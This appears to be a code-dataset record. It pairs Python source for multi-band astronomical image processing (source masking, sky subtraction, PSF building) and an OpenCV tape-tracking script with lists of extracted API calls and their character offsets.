        for loop in range(len(sources)):
            position = (sources['xcentroid'][loop], sources['ycentroid'][loop])
            a = sources['semimajor_axis_sigma'][loop]
            b = sources['semiminor_axis_sigma'][loop]
            theta = sources['orientation'][loop] * 180. / np.pi
            mask = Maskellipse(mask, position, magnification * a, (1 - b / a), theta)
        self.data.mask = mask
        if self.ss_data is not None:
            self.ss_data.mask = mask

    def set_mask(self, mask):
        '''
        Set mask for the extension.

        Parameters
        ----------
        mask : 2D array
            The mask.
        '''
        assert self.data.shape == mask.shape, 'Mask shape incorrect!'
        self.data.mask = mask
        # Bug fix: `Nont` typo previously raised NameError here.
        if self.ss_data is not None:
            self.ss_data.mask = mask

    def set_pixel_scales(self, pixel_scales):
        '''
        Set the pixel scales.

        Parameters
        ----------
        pixel_scales : tuple
            Pixel scales along the first and second directions, units: arcsec.
        '''
        self.pixel_scales = (pixel_scales[0]*u.arcsec, pixel_scales[1]*u.arcsec)

    def set_zero_point(self, zp):
        '''
        Set magnitude zero point.
        '''
        self.zero_point = zp

    def sky_subtraction(self, order=3, filepath=None):
        '''
        Do polynomial-fitting sky subtraction.

        Parameters
        ----------
        order (optional) : int
            Order of the polynomial.
        filepath (optional) : string
            If given, the sky-subtracted image is also written to this path.
        '''
        data = np.array(self.data.copy())
        maskplus = self.data.mask.copy()
        backR = polynomialfit(data, maskplus.astype(bool), order=order)
        background = backR['bkg']
        self.ss_data = CCDData(data - background, unit=self.data.unit)
        self.ss_data.mask = maskplus
        if filepath is not None:
            hdu_temp = fits.PrimaryHDU(data - background)
            hdu_temp.writeto(filepath, overwrite=True)

    def read_ss_image(self, filepath):
        '''
        Read the sky-subtracted image from `filepath`.
        '''
        hdu = fits.open(filepath)
        self.ss_data = CCDData(hdu[0].data, unit=self.data.unit)
        self.ss_data.mask = self.data.mask.copy()

    def cal_sigma_image(self, filepath=None):
        '''
        Construct sigma map following the same procedure as Galfit (quadrature
        sum of sigma at each pixel from source and sky background).

        Note
        ----------
        'GAIN' keyword must be available in the image header and
        ADU x GAIN = electron.

        Parameters
        ----------
        filepath (optional) : string
            Whether and where to save the sigma map.
        '''
        GAIN = self.data.header['CELL.GAIN']
        if self.ss_data is None:
            raise ValueError(" Please do sky subtration first !!!")
        data = np.array(self.ss_data.copy())
        mask = self.ss_data.mask.copy()
        # Background rms from the unmasked (background) pixels; source pixels
        # additionally get the Poisson term data/GAIN.
        bkgrms = np.nanstd(data[~mask.astype(bool)])
        data[~mask.astype(bool)] = 0.
        sigmap = np.sqrt(data/GAIN + bkgrms**2)
        self.sigma_image = sigmap
        if filepath is not None:
            hdu_temp = fits.PrimaryHDU(sigmap)
            hdu_temp.writeto(filepath, overwrite=True)

    def read_sigmap(self, filepath):
        '''
        Read the sigma image from `filepath`.
        '''
        hdu = fits.open(filepath)
        self.sigma_image = hdu[0].data

    def read_PSF(self, filepath):
        '''
        Read the PSF image from `filepath`.
        '''
        hdu = fits.open(filepath)
        self.PSF = hdu[0].data
class image_atlas(object):
    '''
    A collection of `image` objects (typically one per band).
    '''
    def __init__(self, image_list=None, zp_list=None, band_list=None, psfFWHM_list=None):
        '''
        Parameters
        ----------
        image_list (optional) : List
            List of `image`.
        zp_list (optional) : List
            List of magnitude zeropoint.
        band_list (optional) : List
            List of band name. Check `instrument_info` for band names.
        psfFWHM_list (optional) : List
            List of PSF FWHMs, one per image.
        '''
        self.image_list = [] if image_list is None else image_list
        self.band_list = [] if band_list is None else band_list
        if (zp_list is None) and (band_list is not None):
            zp_list = [get_zp(b) for b in band_list]
        # Only assign zero points when they are available; previously a
        # missing zp_list crashed with TypeError for non-empty image lists.
        if zp_list is not None:
            for loop, img in enumerate(self.image_list):
                img.set_zero_point(zp_list[loop])
        self.psfFWHM_list = [] if psfFWHM_list is None else psfFWHM_list
        # Bug fix: use self.image_list; `len(image_list)` raised TypeError
        # when the default (None) was used.
        self.__length = len(self.image_list)
        self.common_catalog = None

    def __getitem__(self, key):
        '''
        Get the image data using the filter name or number index.
        '''
        if isinstance(key, str):
            idx = self.band_list.index(key)
        elif isinstance(key, int):
            idx = key
        else:
            raise TypeError('The key should be a band name (str) or an index (int)!')
        return self.image_list[idx]

    def __len__(self):
        '''
        Get the length of the data list.
        '''
        return self.__length

    def source_detection(self, nsigma=3.0):
        '''
        Do multi-band source detection.

        Parameters
        ----------
        nsigma : float, or a array with same size as image_atlas
            source detection threshold
        '''
        # Accept plain ints as well as floats (generalized from
        # `type(nsigma) == float`).
        if isinstance(nsigma, (int, float)):
            nsigma = nsigma * np.ones(self.__length, dtype=float)
        for loop in range(self.__length):
            self.image_list[loop].source_detection_individual(
                self.psfFWHM_list[loop], nsigma=nsigma[loop], sc_key=loop + 1)

    def make_common_catalog(self, CM_separation=2.5, magnification=3.0, applylist=None):
        '''
        Cross-match the per-band catalogs into a common catalog.

        Parameters
        ----------
        CM_separation : float
            angular separation used to do sky coordinates crossmatching, unit in deg
        magnification : float, or a array with same size as image_atlas
            magnification for generating mask for each image
        applylist : [list of index]
            None for all images
        '''
        if isinstance(magnification, (int, float)):
            magnification = magnification * np.ones(self.__length, dtype=float)
        if applylist is None:
            applylist = np.arange(self.__length)
        cats = []
        for loop in applylist:
            cats.append(self.image_list[loop].sources_skycord)
        # Bug fix: honor the CM_separation argument (was hard-coded to 2.5).
        comc = cross_match(cats, angular_sep=CM_separation)
        lencc = len(comc)
        master_a = np.zeros(lencc, dtype=float)
        master_b = np.zeros(lencc, dtype=float)
        for loop in range(lencc):
            a = []
            b = []
            for loop2 in applylist:
                a.append(self.image_list[loop2].sources_catalog['semimajor_axis_sigma'][comc['sloop_{0}'.format(loop2+1)][loop]]
                         * magnification[loop2] * self.image_list[loop2].pixel_scales[0].value)
                b.append(self.image_list[loop2].sources_catalog['semiminor_axis_sigma'][comc['sloop_{0}'.format(loop2+1)][loop]]
                         * magnification[loop2] * self.image_list[loop2].pixel_scales[0].value)
            master_a[loop] = np.max(np.array(a))
            master_b[loop] = np.max(np.array(b))
        comc.add_column(Column(master_a, name='master_a'))
        comc.add_column(Column(master_b, name='master_b'))
        self.common_catalog = comc

    def sky_subtraction(self, order=3, filepaths=None):
        '''
        Do multi-band sky subtraction.

        Parameters
        ----------
        order (optional) : int
            order of the polynomial
        filepaths : filepath to store the sky subtracted images
        '''
        if isinstance(order, int):
            order = order * np.ones(self.__length, dtype=int)
        for loop in range(self.__length):
            if filepaths is None:
                self.image_list[loop].sky_subtraction(order[loop])
            else:
                self.image_list[loop].sky_subtraction(order[loop], filepath=filepaths[loop])

    def master_mask(self, magnification=3.0, applylist=None):
        '''
        Do multi-band source masking using the common catalog sizes.

        Parameters
        ----------
        magnification : float, or a array with same size as image_atlas
            magnification for generating mask for each image
        applylist : [list of index]
            None for all images
        '''
        if isinstance(magnification, (int, float)):
            magnification = magnification * np.ones(self.__length, dtype=float)
        if applylist is None:
            applylist = np.arange(self.__length)
        comc = self.common_catalog.copy()
        commonsourcelist = []
        for loop2 in applylist:
            newsc = self.image_list[loop2].sources_catalog.copy()
            # Overwrite each cross-matched source's ellipse with the master
            # (largest) size, converted back into this image's pixel scale.
            for loop in range(len(comc)):
                self.image_list[loop2].sources_catalog['semimajor_axis_sigma'][comc['sloop_{0}'.format(loop2+1)][loop]] = comc['master_a'][loop]/(magnification[loop2]*self.image_list[loop2].pixel_scales[0].value)
                self.image_list[loop2].sources_catalog['semiminor_axis_sigma'][comc['sloop_{0}'.format(loop2+1)][loop]] = comc['master_b'][loop]/(magnification[loop2]*self.image_list[loop2].pixel_scales[0].value)
            indexes = np.delete(np.arange(len(self.image_list[loop2].sources_catalog)), comc['sloop_{0}'.format(loop2+1)])
            newsc.remove_rows(indexes)
            commonsourcelist.append(newsc)
        for loop2 in range(self.__length):
            self.image_list[loop2].make_mask(sources=commonsourcelist[loop2], magnification=magnification[loop2])

    def generate_PSFs(self, equivalent_radius=2., size=20., oversampling=1, plot=None, filepaths=None):
        '''
        Generate effective point spread functions (ePSFs) for each image.

        Parameters
        ----------
        equivalent_radius : float, unit arcsec
            radius criteria to indentify star
        size : float, unit pixel
            use what size box to extract stars
        oversampling : int
            oversample the ePSF
        plot : None for not plot stars & ePSF
            list like [1,2,3] to plot rgb image
        filepaths : filepath to store the ePSFs
        '''
        # Keep only cross-matched sources that look point-like (small
        # equivalent radius) in every band.
        stars = self.common_catalog.copy()
        remolist = []
        for loop in range(len(stars)):
            for loop2 in range(self.__length):
                a = (self.image_list[loop2].sources_catalog['equivalent_radius'][stars['sloop_{0}'.format(loop2+1)][loop]])*self.image_list[loop2].pixel_scales[0].value
                if (a > equivalent_radius):
                    remolist.append(loop)
                    break
        stars.remove_rows(remolist)
        star_images = []
        PSFs = []
        for loop2 in range(self.__length):
            newsc = self.image_list[loop2].sources_catalog.copy()
            indexes = np.delete(np.arange(len(self.image_list[loop2].sources_catalog)), stars['sloop_{0}'.format(loop2+1)])
            newsc.remove_rows(indexes)
            stars_tbl = Table()
            stars_tbl['x'] = np.array(newsc['maxval_xpos'])
            stars_tbl['y'] = np.array(newsc['maxval_ypos'])
            nddata = NDData(data=np.array(self.image_list[loop2].ss_data))
            Tstar = extract_stars(nddata, stars_tbl, size=size)
            epsf_builder = EPSFBuilder(oversampling=oversampling, maxiters=15, progress_bar=False)
            epsf, fitted_stars = epsf_builder(Tstar)
            self.image_list[loop2].PSF = epsf.data
            if filepaths is not None:
                hdu = fits.PrimaryHDU(epsf.data.astype('float32'))
                After = fits.HDUList([hdu])
                After.writeto(filepaths[loop2], overwrite=True)
            if plot is not None:
                star_images.append(Tstar)
                PSFs.append(epsf.data)
        if plot is not None:
            tlens = len(stars)
            # Pick the grid (4 or 5 columns) that leaves fewer empty panels.
            if (((tlens//5)+1)*5-tlens) < (((tlens//4)+1)*4-tlens):
                ncols = 5
                nrows = (tlens//5)+1
            else:
                ncols = 4
                nrows = (tlens//4)+1
            fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(3*ncols, 3*nrows), squeeze=True)
            ax = ax.ravel()
            for i in range(tlens):
                if len(plot) > 2:
                    star_b = star_images[plot[0]][i].data*100./np.sum(star_images[plot[0]][i].data)
                    star_g = star_images[plot[1]][i].data*100./np.sum(star_images[plot[1]][i].data)
                    star_r = star_images[plot[2]][i].data*100./np.sum(star_images[plot[2]][i].data)
                    norm = simple_norm(star_b, 'log', percent=99.)
                    image = make_lupton_rgb(star_r, star_g, star_b, Q=10)
                else:
                    image = star_images[plot[0]][i].data
                    norm = simple_norm(image, 'log', percent=99.)
                ax[i].imshow(image, norm=norm, origin='lower')
            plt.show()
            fig = plt.figure(figsize=(10, 10))
            if len(plot) > 2:
                star_b = PSFs[plot[0]]*100./np.sum(PSFs[plot[0]])
                star_g = PSFs[plot[1]]*100./np.sum(PSFs[plot[1]])
                star_r = PSFs[plot[2]]*100./np.sum(PSFs[plot[2]])
                norm = simple_norm(star_b, 'log', percent=99.)
                image = make_lupton_rgb(star_r, star_g, star_b, Q=10)
            else:
                image = PSFs[plot[0]]
                norm = simple_norm(image, 'log', percent=99.)
            plt.imshow(image, norm=norm, origin='lower')
            plt.show()
| [
"numpy.sqrt",
"astropy.table.Table",
"numpy.array",
"photutils.source_properties",
"photutils.psf.extract_stars",
"astropy.io.fits.open",
"numpy.arange",
"matplotlib.pyplot.imshow",
"photutils.EPSFBuilder",
"astropy.units.degree.to",
"astropy.visualization.make_lupton_rgb",
"astropy.nddata.CCD... | [((5528, 5594), 'astropy.stats.sigma_clipped_stats', 'sigma_clipped_stats', (['self.data.data'], {'mask': 'self.data.mask'}), '(self.data.data, mask=self.data.mask, **kwargs)\n', (5547, 5594), False, 'from astropy.stats import sigma_clipped_stats\n'), ((7580, 7605), 'numpy.abs', 'np.abs', (['(xlim[1] - xlim[0])'], {}), '(xlim[1] - xlim[0])\n', (7586, 7605), True, 'import numpy as np\n'), ((8309, 8353), 'numpy.sqrt', 'np.sqrt', (['(d_arrow1[0] ** 2 + d_arrow1[1] ** 2)'], {}), '(d_arrow1[0] ** 2 + d_arrow1[1] ** 2)\n', (8316, 8353), True, 'import numpy as np\n'), ((8369, 8413), 'numpy.sqrt', 'np.sqrt', (['(d_arrow2[0] ** 2 + d_arrow2[1] ** 2)'], {}), '(d_arrow2[0] ** 2 + d_arrow2[1] ** 2)\n', (8376, 8413), True, 'import numpy as np\n'), ((9920, 9944), 'astropy.nddata.CCDData', 'CCDData', (['data'], {'unit': 'unit'}), '(data, unit=unit)\n', (9927, 9944), False, 'from astropy.nddata import CCDData\n'), ((10346, 10383), 'photutils.detect_threshold', 'detect_threshold', (['data'], {'nsigma': 'nsigma'}), '(data, nsigma=nsigma)\n', (10362, 10383), False, 'from photutils import detect_threshold\n'), ((10453, 10496), 'astropy.convolution.Gaussian2DKernel', 'Gaussian2DKernel', (['sigma'], {'x_size': '(5)', 'y_size': '(5)'}), '(sigma, x_size=5, y_size=5)\n', (10469, 10496), False, 'from astropy.convolution import Gaussian2DKernel\n'), ((10539, 10605), 'photutils.detect_sources', 'detect_sources', (['data', 'thresholder'], {'npixels': '(5)', 'filter_kernel': 'kernel'}), '(data, thresholder, npixels=5, filter_kernel=kernel)\n', (10553, 10605), False, 'from photutils import detect_sources\n'), ((10622, 10651), 'photutils.source_properties', 'source_properties', (['data', 'segm'], {}), '(data, segm)\n', (10639, 10651), False, 'from photutils import source_properties\n'), ((10826, 10878), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['srcPstradec[0]', 'srcPstradec[1]'], {'unit': '"""deg"""'}), "(srcPstradec[0], srcPstradec[1], unit='deg')\n", (10834, 
10878), False, 'from astropy.coordinates import SkyCoord\n'), ((11380, 11416), 'numpy.zeros_like', 'np.zeros_like', (['self.data'], {'dtype': 'bool'}), '(self.data, dtype=bool)\n', (11393, 11416), True, 'import numpy as np\n'), ((13258, 13305), 'astropy.nddata.CCDData', 'CCDData', (['(data - background)'], {'unit': 'self.data.unit'}), '(data - background, unit=self.data.unit)\n', (13265, 13305), False, 'from astropy.nddata import CCDData\n'), ((13612, 13631), 'astropy.io.fits.open', 'fits.open', (['filepath'], {}), '(filepath)\n', (13621, 13631), False, 'from astropy.io import fits\n'), ((13655, 13696), 'astropy.nddata.CCDData', 'CCDData', (['hdu[0].data'], {'unit': 'self.data.unit'}), '(hdu[0].data, unit=self.data.unit)\n', (13662, 13696), False, 'from astropy.nddata import CCDData\n'), ((14500, 14534), 'numpy.sqrt', 'np.sqrt', (['(data / GAIN + bkgrms ** 2)'], {}), '(data / GAIN + bkgrms ** 2)\n', (14507, 14534), True, 'import numpy as np\n'), ((14815, 14834), 'astropy.io.fits.open', 'fits.open', (['filepath'], {}), '(filepath)\n', (14824, 14834), False, 'from astropy.io import fits\n'), ((14986, 15005), 'astropy.io.fits.open', 'fits.open', (['filepath'], {}), '(filepath)\n', (14995, 15005), False, 'from astropy.io import fits\n'), ((18034, 18062), 'numpy.zeros', 'np.zeros', (['lencc'], {'dtype': 'float'}), '(lencc, dtype=float)\n', (18042, 18062), True, 'import numpy as np\n'), ((18084, 18112), 'numpy.zeros', 'np.zeros', (['lencc'], {'dtype': 'float'}), '(lencc, dtype=float)\n', (18092, 18112), True, 'import numpy as np\n'), ((2529, 2582), 'astropy.nddata.CCDData.read', 'CCDData.read', (['filename'], {'hdu': 'hdu', 'unit': 'unit', 'mask': 'mask'}), '(filename, hdu=hdu, unit=unit, mask=mask)\n', (2541, 2582), False, 'from astropy.nddata import CCDData\n'), ((8928, 8945), 'numpy.sign', 'np.sign', (['d_arrow1'], {}), '(d_arrow1)\n', (8935, 8945), True, 'import numpy as np\n'), ((8979, 8996), 'numpy.sign', 'np.sign', (['d_arrow2'], {}), '(d_arrow2)\n', (8986, 8996), 
True, 'import numpy as np\n'), ((11430, 11449), 'numpy.isnan', 'np.isnan', (['self.data'], {}), '(self.data)\n', (11438, 11449), True, 'import numpy as np\n'), ((11471, 11490), 'numpy.isinf', 'np.isinf', (['self.data'], {}), '(self.data)\n', (11479, 11490), True, 'import numpy as np\n'), ((13397, 13431), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['(data - background)'], {}), '(data - background)\n', (13412, 13431), False, 'from astropy.io import fits\n'), ((14619, 14642), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['sigmap'], {}), '(sigmap)\n', (14634, 14642), False, 'from astropy.io import fits\n'), ((17801, 17825), 'numpy.arange', 'np.arange', (['self.__length'], {}), '(self.__length)\n', (17810, 17825), True, 'import numpy as np\n'), ((18775, 18808), 'astropy.table.Column', 'Column', (['master_a'], {'name': '"""master_a"""'}), "(master_a, name='master_a')\n", (18781, 18808), False, 'from astropy.table import Table, Column, join, join_skycoord\n'), ((18836, 18869), 'astropy.table.Column', 'Column', (['master_b'], {'name': '"""master_b"""'}), "(master_b, name='master_b')\n", (18842, 18869), False, 'from astropy.table import Table, Column, join, join_skycoord\n'), ((20083, 20107), 'numpy.arange', 'np.arange', (['self.__length'], {}), '(self.__length)\n', (20092, 20107), True, 'import numpy as np\n'), ((22561, 22568), 'astropy.table.Table', 'Table', ([], {}), '()\n', (22566, 22568), False, 'from astropy.table import Table, Column, join, join_skycoord\n'), ((22596, 22626), 'numpy.array', 'np.array', (["newsc['maxval_xpos']"], {}), "(newsc['maxval_xpos'])\n", (22604, 22626), True, 'import numpy as np\n'), ((22654, 22684), 'numpy.array', 'np.array', (["newsc['maxval_ypos']"], {}), "(newsc['maxval_ypos'])\n", (22662, 22684), True, 'import numpy as np\n'), ((22780, 22823), 'photutils.psf.extract_stars', 'extract_stars', (['nddata', 'stars_tbl'], {'size': 'size'}), '(nddata, stars_tbl, size=size)\n', (22793, 22823), False, 'from photutils.psf import 
extract_stars\n'), ((22851, 22922), 'photutils.EPSFBuilder', 'EPSFBuilder', ([], {'oversampling': 'oversampling', 'maxiters': '(15)', 'progress_bar': '(False)'}), '(oversampling=oversampling, maxiters=15, progress_bar=False)\n', (22862, 22922), False, 'from photutils import EPSFBuilder\n'), ((23647, 23735), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': 'nrows', 'ncols': 'ncols', 'figsize': '(3 * ncols, 3 * nrows)', 'squeeze': '(True)'}), '(nrows=nrows, ncols=ncols, figsize=(3 * ncols, 3 * nrows),\n squeeze=True)\n', (23659, 23735), True, 'import matplotlib.pyplot as plt\n'), ((24484, 24494), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (24492, 24494), True, 'import matplotlib.pyplot as plt\n'), ((24511, 24539), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (24521, 24539), True, 'import matplotlib.pyplot as plt\n'), ((25030, 25074), 'matplotlib.pyplot.imshow', 'plt.imshow', (['image'], {'norm': 'norm', 'origin': '"""lower"""'}), "(image, norm=norm, origin='lower')\n", (25040, 25074), True, 'import matplotlib.pyplot as plt\n'), ((25086, 25096), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (25094, 25096), True, 'import matplotlib.pyplot as plt\n'), ((16920, 16955), 'numpy.ones', 'np.ones', (['self.__length'], {'dtype': 'float'}), '(self.__length, dtype=float)\n', (16927, 16955), True, 'import numpy as np\n'), ((17712, 17747), 'numpy.ones', 'np.ones', (['self.__length'], {'dtype': 'float'}), '(self.__length, dtype=float)\n', (17719, 17747), True, 'import numpy as np\n'), ((18689, 18700), 'numpy.array', 'np.array', (['a'], {}), '(a)\n', (18697, 18700), True, 'import numpy as np\n'), ((18738, 18749), 'numpy.array', 'np.array', (['b'], {}), '(b)\n', (18746, 18749), True, 'import numpy as np\n'), ((19252, 19285), 'numpy.ones', 'np.ones', (['self.__length'], {'dtype': 'int'}), '(self.__length, dtype=int)\n', (19259, 19285), True, 'import numpy as np\n'), ((19994, 20029), 'numpy.ones', 
'np.ones', (['self.__length'], {'dtype': 'float'}), '(self.__length, dtype=float)\n', (20001, 20029), True, 'import numpy as np\n'), ((23155, 23174), 'astropy.io.fits.HDUList', 'fits.HDUList', (['[hdu]'], {}), '([hdu])\n', (23167, 23174), False, 'from astropy.io import fits\n'), ((24790, 24830), 'astropy.visualization.simple_norm', 'simple_norm', (['star_b', '"""log"""'], {'percent': '(99.0)'}), "(star_b, 'log', percent=99.0)\n", (24801, 24830), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24854, 24899), 'astropy.visualization.make_lupton_rgb', 'make_lupton_rgb', (['star_r', 'star_g', 'star_b'], {'Q': '(10)'}), '(star_r, star_g, star_b, Q=10)\n', (24869, 24899), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24979, 25018), 'astropy.visualization.simple_norm', 'simple_norm', (['image', '"""log"""'], {'percent': '(99.0)'}), "(image, 'log', percent=99.0)\n", (24990, 25018), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((2671, 2709), 'astropy.wcs.utils.proj_plane_pixel_scales', 'proj_plane_pixel_scales', (['self.data.wcs'], {}), '(self.data.wcs)\n', (2694, 2709), False, 'from astropy.wcs.utils import proj_plane_pixel_scales\n'), ((2712, 2733), 'astropy.units.degree.to', 'u.degree.to', (['"""arcsec"""'], {}), "('arcsec')\n", (2723, 2733), True, 'from astropy import units as u\n'), ((8429, 8447), 'numpy.array', 'np.array', (['d_arrow1'], {}), '(d_arrow1)\n', (8437, 8447), True, 'import numpy as np\n'), ((8499, 8517), 'numpy.array', 'np.array', (['d_arrow2'], {}), '(d_arrow2)\n', (8507, 8517), True, 'import numpy as np\n'), ((22718, 22758), 'numpy.array', 'np.array', (['self.image_list[loop2].ss_data'], {}), '(self.image_list[loop2].ss_data)\n', (22726, 22758), True, 'import numpy as np\n'), ((24151, 24191), 'astropy.visualization.simple_norm', 'simple_norm', (['star_b', '"""log"""'], {'percent': '(99.0)'}), "(star_b, 'log', percent=99.0)\n", (24162, 24191), False, 'from 
astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24219, 24264), 'astropy.visualization.make_lupton_rgb', 'make_lupton_rgb', (['star_r', 'star_g', 'star_b'], {'Q': '(10)'}), '(star_r, star_g, star_b, Q=10)\n', (24234, 24264), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24371, 24410), 'astropy.visualization.simple_norm', 'simple_norm', (['image', '"""log"""'], {'percent': '(99.0)'}), "(image, 'log', percent=99.0)\n", (24382, 24410), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24613, 24634), 'numpy.sum', 'np.sum', (['PSFs[plot[0]]'], {}), '(PSFs[plot[0]])\n', (24619, 24634), True, 'import numpy as np\n'), ((24679, 24700), 'numpy.sum', 'np.sum', (['PSFs[plot[1]]'], {}), '(PSFs[plot[1]])\n', (24685, 24700), True, 'import numpy as np\n'), ((24745, 24766), 'numpy.sum', 'np.sum', (['PSFs[plot[2]]'], {}), '(PSFs[plot[2]])\n', (24751, 24766), True, 'import numpy as np\n'), ((23887, 23923), 'numpy.sum', 'np.sum', (['star_images[plot[0]][i].data'], {}), '(star_images[plot[0]][i].data)\n', (23893, 23923), True, 'import numpy as np\n'), ((23987, 24023), 'numpy.sum', 'np.sum', (['star_images[plot[1]][i].data'], {}), '(star_images[plot[1]][i].data)\n', (23993, 24023), True, 'import numpy as np\n'), ((24087, 24123), 'numpy.sum', 'np.sum', (['star_images[plot[2]][i].data'], {}), '(star_images[plot[2]][i].data)\n', (24093, 24123), True, 'import numpy as np\n')] |
import cv2
import numpy as np
class TapeTracker(object):
    """Detects two strips of coloured tape in a BGR frame and computes a
    horizontal steering error from their midpoint.

    Side effects of :meth:`pipeline`: sets ``self.img`` (resized HLS frame),
    ``self.mask`` (binary threshold mask), ``self.cnt``/``self.hier``
    (contours), ``self.ret`` (annotated image), ``self.cnt_f`` (filtered tape
    contours) and ``self.error`` (horizontal offset).
    """
    # HLS colour bounds used to segment the tape.
    min_thresh = np.array([80, 0, 0])
    max_thresh = np.array([90, 255, 255])
    def __init__(self):
        # Bug fix: was misspelled ``__init_`` so it never ran as the
        # constructor; provide a placeholder frame so ``self.img`` exists
        # before the first pipeline() call.
        self.img = np.zeros((500, 500))
    def pipeline(self, img):
        """Run the full detection pipeline on one BGR frame.

        :param img: BGR image (any size; it is resized to 300x300).
        """
        self.img = cv2.resize(img, (300, 300), cv2.INTER_NEAREST)
        self.img = cv2.cvtColor(self.img, cv2.COLOR_BGR2HLS)
        self.mask = cv2.inRange(self.img, self.min_thresh, self.max_thresh)
        self.cnt, self.hier = cv2.findContours(self.mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
        self.ret = np.copy(self.img)
        self.cnt_f = []
        # Keep only the two largest contours, then filter for tall, thin,
        # non-trivial shapes (tape-like).
        self.cnt = sorted(self.cnt, key=cv2.contourArea, reverse=True)[:2]
        for cnt in self.cnt:
            x, y, w, h = cv2.boundingRect(cnt)
            if w < 0.6 * h and cv2.contourArea(cnt) > 10:
                cv2.rectangle(self.ret, (x, y), (x + w, y + h), (0, 255, 0), 2)
                self.cnt_f.append(cnt)
        if len(self.cnt_f) < 2:
            # Robustness: fewer than two tape candidates in this frame --
            # previously this crashed with IndexError below.
            return
        M_1 = cv2.moments(self.cnt_f[0])
        cx_1 = int(M_1['m10'] / M_1['m00'])
        cy_1 = int(M_1['m01'] / M_1['m00'])
        M_2 = cv2.moments(self.cnt_f[1])
        cx_2 = int(M_2['m10'] / M_2['m00'])
        cy_2 = int(M_2['m01'] / M_2['m00'])
        # Midpoint between the two tape centroids.
        midpoint = ((cx_1 + cx_2) // 2, (cy_1 + cy_2) // 2)
        # NOTE(review): the original commented-out code suggests the intended
        # error is ``midpoint[0] - width // 2`` (offset from image centre);
        # kept as-is pending confirmation.
        self.error = midpoint[0] - self.img.shape[0]
        print(self.error)
        self.ret = cv2.drawContours(self.ret, self.cnt_f, -1, (150, 150, 255), 2)
        self.ret = cv2.circle(self.ret, (cx_1, cy_1), 2, (150, 155, 255))
        self.ret = cv2.circle(self.ret, (cx_2, cy_2), 2, (150, 155, 255))
        self.ret = cv2.circle(self.ret, midpoint, 2, (150, 255, 255))
if __name__ == "__main__":
    # Demo: run the tracker on a sample image and display each stage.
    tracker = TapeTracker()
    frame = cv2.imread('img/1.jpg')
    tracker.pipeline(frame)
    display_size = (500, 500)
    output_bgr = cv2.cvtColor(tracker.img, cv2.COLOR_HLS2BGR)
    contour_bgr = cv2.cvtColor(tracker.ret, cv2.COLOR_HLS2BGR)
    cv2.imshow('output', cv2.resize(output_bgr, display_size, cv2.INTER_NEAREST))
    cv2.imshow('mask', cv2.resize(tracker.mask, display_size, cv2.INTER_NEAREST))
    cv2.imshow('contour', cv2.resize(contour_bgr, display_size, cv2.INTER_NEAREST))
    key = cv2.waitKey(0) & 0xFF
    if key == 27:  # Esc closes the windows
        cv2.destroyAllWindows()
| [
"cv2.rectangle",
"numpy.copy",
"cv2.drawContours",
"numpy.ones",
"cv2.inRange",
"cv2.contourArea",
"numpy.array",
"numpy.zeros",
"cv2.circle",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.cvtColor",
"cv2.moments",
"cv2.findContours",
"cv2.resize",
"cv2.imread",
"cv2.boundingRect"
] | [((74, 94), 'numpy.array', 'np.array', (['[80, 0, 0]'], {}), '([80, 0, 0])\n', (82, 94), True, 'import numpy as np\n'), ((110, 134), 'numpy.array', 'np.array', (['[90, 255, 255]'], {}), '([90, 255, 255])\n', (118, 134), True, 'import numpy as np\n'), ((1765, 1788), 'cv2.imread', 'cv2.imread', (['"""img/1.jpg"""'], {}), "('img/1.jpg')\n", (1775, 1788), False, 'import cv2\n'), ((173, 193), 'numpy.zeros', 'np.zeros', (['(500, 500)'], {}), '((500, 500))\n', (181, 193), True, 'import numpy as np\n'), ((235, 281), 'cv2.resize', 'cv2.resize', (['img', '(300, 300)', 'cv2.INTER_NEAREST'], {}), '(img, (300, 300), cv2.INTER_NEAREST)\n', (245, 281), False, 'import cv2\n'), ((296, 337), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2HLS'], {}), '(self.img, cv2.COLOR_BGR2HLS)\n', (308, 337), False, 'import cv2\n'), ((359, 414), 'cv2.inRange', 'cv2.inRange', (['self.img', 'self.min_thresh', 'self.max_thresh'], {}), '(self.img, self.min_thresh, self.max_thresh)\n', (370, 414), False, 'import cv2\n'), ((433, 458), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.uint8'], {}), '((5, 5), np.uint8)\n', (440, 458), True, 'import numpy as np\n'), ((555, 620), 'cv2.findContours', 'cv2.findContours', (['self.mask', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_NONE'], {}), '(self.mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n', (571, 620), False, 'import cv2\n'), ((641, 658), 'numpy.copy', 'np.copy', (['self.img'], {}), '(self.img)\n', (648, 658), True, 'import numpy as np\n'), ((997, 1023), 'cv2.moments', 'cv2.moments', (['self.cnt_f[0]'], {}), '(self.cnt_f[0])\n', (1008, 1023), False, 'import cv2\n'), ((1115, 1141), 'cv2.moments', 'cv2.moments', (['self.cnt_f[1]'], {}), '(self.cnt_f[1])\n', (1126, 1141), False, 'import cv2\n'), ((1439, 1501), 'cv2.drawContours', 'cv2.drawContours', (['self.ret', 'self.cnt_f', '(-1)', '(150, 150, 255)', '(2)'], {}), '(self.ret, self.cnt_f, -1, (150, 150, 255), 2)\n', (1455, 1501), False, 'import cv2\n'), ((1517, 1571), 'cv2.circle', 'cv2.circle', 
